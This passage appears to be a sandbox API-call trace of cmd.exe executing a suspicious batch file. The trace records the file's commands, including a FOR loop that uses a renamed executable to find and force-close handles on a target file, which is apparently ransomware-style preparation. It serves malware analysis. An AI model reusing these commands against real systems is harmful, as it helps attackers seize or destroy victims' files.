lpNumberOfCharsWritten=0xcdf4dc*=0x17) returned 1 [0276.457] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf500 | out: _Buffer="\r\n") returned 2 [0276.457] _get_osfhandle (_FileHandle=1) returned 0x3c [0276.457] GetFileType (hFile=0x3c) returned 0x2 [0276.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0276.457] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4d8 | out: lpMode=0xcdf4d8) returned 1 [0277.051] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.051] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4f0*=0x2) returned 1 [0277.755] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0277.755] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0277.755] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0277.756] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0277.756] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0277.756] _wcsicmp (_String1="set", _String2="CD") returned 16 [0277.756] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0277.756] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0277.756] _wcsicmp (_String1="set", _String2="REN") returned 1 [0277.756] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0277.756] _wcsicmp (_String1="set", _String2="SET") returned 0 [0277.756] GetConsoleTitleW (in: lpConsoleTitle=0xcdf070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0278.675] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0278.675] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0278.675] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0278.675] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0278.675] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0278.675] _wcsicmp (_String1="set", _String2="CD") returned 16 [0278.675] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0278.675] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0278.675] _wcsicmp (_String1="set", _String2="REN") returned 1 [0278.675] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0278.675] _wcsicmp (_String1="set", _String2="SET") returned 0 [0278.675] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0278.676] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0278.676] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0278.676] SetEnvironmentVariableW (lpName="FN", lpValue="\"Workflow.Targets\"") returned 1 [0278.676] GetEnvironmentStringsW () returned 0xecce18* [0278.676] FreeEnvironmentStringsA (penv="=") returned 1 [0278.676] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.676] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0278.880] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.881] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0279.061] _get_osfhandle (_FileHandle=0) returned 0x38 [0279.061] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0280.354] SetConsoleInputExeNameW () returned 0x1 [0280.354] GetConsoleOutputCP () returned 0x1b5 [0280.597] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0280.597] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.654] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xcdf4bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0280.654] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0280.654] _get_osfhandle (_FileHandle=3) returned 0xb0 [0280.654] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0280.654] _get_osfhandle (_FileHandle=3) returned 0xb0 [0280.654] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0280.654] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0xa3, lpOverlapped=0x0) returned 1 [0280.655] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0280.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0280.655] _get_osfhandle (_FileHandle=3) returned 0xb0 [0280.655] GetFileType (hFile=0xb0) returned 0x1 [0280.655] _get_osfhandle (_FileHandle=3) returned 0xb0 [0280.655] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0280.655] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0xcdec08, lpFilePart=0xcdebcc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xcdebcc*="vRnqNMBW.bat") returned 0x2a [0280.655] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0280.655] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0280.656] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0280.656] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0280.656] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0280.656] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0280.656] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0280.656] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0xcde910 | out: lpFindFileData=0xcde910) returned 0xecb290 [0280.656] FindClose (in: hFindFile=0xecb290 | out: hFindFile=0xecb290) returned 1 [0280.656] _wcsicmp (_String1="cd", _String2=")") returned 58 [0280.656] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0280.656] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0280.657] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0280.657] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0280.657] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0280.657] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0280.657] _tell (_FileHandle=3) returned 78 [0280.657] _close (_FileHandle=3) returned 0 [0280.657] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf250 | out: _Buffer="\r\n") returned 2 [0280.657] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.657] GetFileType (hFile=0x3c) returned 0x2 [0280.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.657] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf228 | out: lpMode=0xcdf228) returned 1 [0280.679] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.679] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf240, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf240*=0x2) returned 1 [0280.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0280.688] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.688] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xcdf24c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0280.688] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xcdf24c | out: _Buffer=">") returned 1 [0280.688] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.688] GetFileType (hFile=0x3c) returned 0x2 [0280.688] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.688] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf22c | out: lpMode=0xcdf22c) returned 1 [0280.694] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.694] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcdf244, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xcdf244*=0x1e) returned 1 [0280.754] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.754] GetFileType (hFile=0x3c) returned 0x2 [0280.754] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.754] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4cc | out: lpMode=0xcdf4cc) returned 1 [0280.784] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.784] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xed8350*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4e4, lpReserved=0x0 | out: lpBuffer=0xed8350*, lpNumberOfCharsWritten=0xcdf4e4*=0x2) returned 1 [0280.897] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf4ec | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0280.897] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.897] GetFileType (hFile=0x3c) returned 0x2 [0280.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.897] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0280.922] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.922] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x25) returned 1 [0281.060] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf500 | out: _Buffer="\r\n") returned 2 [0281.060] _get_osfhandle (_FileHandle=1) returned 0x3c [0281.060] GetFileType (hFile=0x3c) returned 0x2 [0281.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0281.060] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4d8 | out: lpMode=0xcdf4d8) returned 1 [0282.305] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.305] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4f0*=0x2) returned 1 [0282.666] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0282.666] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0282.666] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0282.666] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0282.666] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0282.666] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0282.667] GetConsoleTitleW (in: lpConsoleTitle=0xcdf070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0283.060] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0283.060] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0283.060] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0283.060] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0283.060] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0283.060] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0283.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0283.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0283.061] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xcdee28, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xcdee20, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcdee20*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0283.061] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0283.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xcdebcc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.061] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0xcdebcc, lpFilePart=0xcdebc4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0xcdebc4*=0x0) returned 0x1e [0283.061] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0283.061] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xcde948 | out: lpFindFileData=0xcde948) returned 0xeccc20 [0283.061] FindClose (in: hFindFile=0xeccc20 | out: hFindFile=0xeccc20) returned 1 [0283.061] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xcde948 | out: lpFindFileData=0xcde948) returned 0xeccc20 [0283.061] FindClose (in: hFindFile=0xeccc20 | out: hFindFile=0xeccc20) returned 1 [0283.061] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0283.061] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xcde948 | out: lpFindFileData=0xcde948) returned 0xeccc20 [0283.062] FindClose (in: hFindFile=0xeccc20 | out: hFindFile=0xeccc20) returned 1 [0283.062] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0283.062] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0283.062] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0283.062] GetEnvironmentStringsW () returned 0xecce18* [0283.062] FreeEnvironmentStringsA (penv="=") returned 1 [0283.062] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.062] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.062] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0283.081] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.081] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0283.160] _get_osfhandle (_FileHandle=0) returned 0x38 [0283.160] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0283.266] SetConsoleInputExeNameW () returned 0x1 [0283.266] GetConsoleOutputCP () returned 0x1b5 [0283.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0283.341] SetThreadUILanguage (LangId=0x0) returned 0x409 [0283.518] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xcdf4bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0283.518] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0283.518] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.518] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0283.519] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.519] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0283.519] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0x94, lpOverlapped=0x0) returned 1 [0283.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0283.519] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.519] GetFileType (hFile=0xb0) returned 0x1 [0283.519] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.519] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0283.519] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"Workflow.Targets\"") returned 0x12 [0283.519] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0283.519] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0283.520] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0283.520] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0283.520] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0283.520] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0283.520] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0283.520] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0283.520] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0283.520] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0283.520] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0283.521] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0283.521] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0283.521] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0283.521] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0283.521] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0283.521] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0283.521] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0283.522] _tell (_FileHandle=3) returned 226 [0283.522] _close (_FileHandle=3) returned 0 [0283.522] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf250 | out: _Buffer="\r\n") returned 2 [0283.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.522] GetFileType (hFile=0x3c) returned 0x2 [0283.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.522] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf228 | out: lpMode=0xcdf228) returned 1 [0283.825] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.825] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf240, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf240*=0x2) returned 1 [0284.134] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0284.134] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.134] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xcdf24c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0284.134] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xcdf24c | out: _Buffer=">") returned 1 [0284.134] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.134] GetFileType (hFile=0x3c) returned 0x2 [0284.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.134] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf22c | out: lpMode=0xcdf22c) returned 1 [0284.272] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.272] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcdf244, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xcdf244*=0x1e) returned 1 [0284.288] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xcdf4ec | out: _Buffer="FOR") returned 3 [0284.288] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.288] GetFileType (hFile=0x3c) returned 0x2 [0284.288] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.288] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0284.351] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.351] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x3) returned 1 [0284.810] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xcdf4ec | out: _Buffer=" /F") returned 3 [0284.810] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.810] GetFileType (hFile=0x3c) returned 0x2 [0284.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.810] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0284.896] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.896] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x3) returned 1 [0284.955] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xcdf4ec | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0284.955] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.955] GetFileType (hFile=0x3c) returned 0x2 [0284.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.955] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0284.960] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.960] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x20) returned 1 [0284.973] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xcdf4ec | out: _Buffer=" %I IN ") returned 7 [0284.973] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.973] GetFileType (hFile=0x3c) returned 0x2 [0284.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.973] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0284.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.986] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x7) returned 1 [0284.988] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xcdf4e8 | out: _Buffer="(`vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner`) DO ") returned 61 [0284.988] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.988] GetFileType (hFile=0x3c) returned 0x2 [0284.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.988] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c0 | out: lpMode=0xcdf4c0) returned 1 [0284.991] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.991] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0xcdf4d8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4d8*=0x3d) returned 1 [0285.210] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.210] GetFileType (hFile=0x3c) returned 0x2 [0285.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.210] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4cc | out: lpMode=0xcdf4cc) returned 1 [0285.358] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.358] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xcdf4e4, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xcdf4e4*=0x1) returned 1 [0286.176] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.176] GetFileType (hFile=0x3c) returned 0x2 [0286.176] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.176] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4bc | out: lpMode=0xcdf4bc) returned 1 [0286.445] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.445] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xeccb30*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xcdf4d4, lpReserved=0x0 | out: lpBuffer=0xeccb30*, lpNumberOfCharsWritten=0xcdf4d4*=0xc) returned 1 [0286.988] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf4dc | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0286.988] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.988] GetFileType (hFile=0x3c) returned 0x2 [0286.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.988] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4b4 | out: lpMode=0xcdf4b4) returned 1 [0287.044] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.044] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, 